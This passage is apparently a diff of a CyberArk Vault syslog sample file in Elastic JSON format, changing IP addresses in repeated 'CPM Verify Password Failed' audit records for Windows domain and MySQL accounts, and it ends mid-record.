{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n\n address=67.43.156.15;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=67.43.156.15;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:33:26\n 2021-03-15T13:33:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:04:11\n 2021-03-15T15:04:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:35:01\n 2021-03-15T16:35:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} <7>1 2021-03-15T16:56:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 09:56:29\n 2021-03-15T16:56:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:56:29","IsoTimestamp":"2021-03-15T16:56:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827245"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server 10.0.1.20. State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:01:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:01:07\n 2021-03-15T17:01:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:01:07","IsoTimestamp":"2021-03-15T17:01:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827554"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"mariadb"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM014 Native error: 0 Message: [Microsoft][ODBC Driver Manager] The specified DSN contains an architecture mismatch between the Driver and Application"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:05:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:05:47\n 2021-03-15T17:05:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=10.0.1.20;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:05:47","IsoTimestamp":"2021-03-15T17:05:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=10.0.1.20;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"10.0.1.20"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615827864"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"DSN","Value":"DRIVER={MariaDB ODBC 3.1 Driver};TCPIP=1;SERVER=localhost;UID=root;PWD=1234;DATABASE=test"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} @@ -11,5 +11,5 @@ <7>1 2021-03-15T17:33:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:33:17\n 2021-03-15T17:33:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:33:17","IsoTimestamp":"2021-03-15T17:33:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). 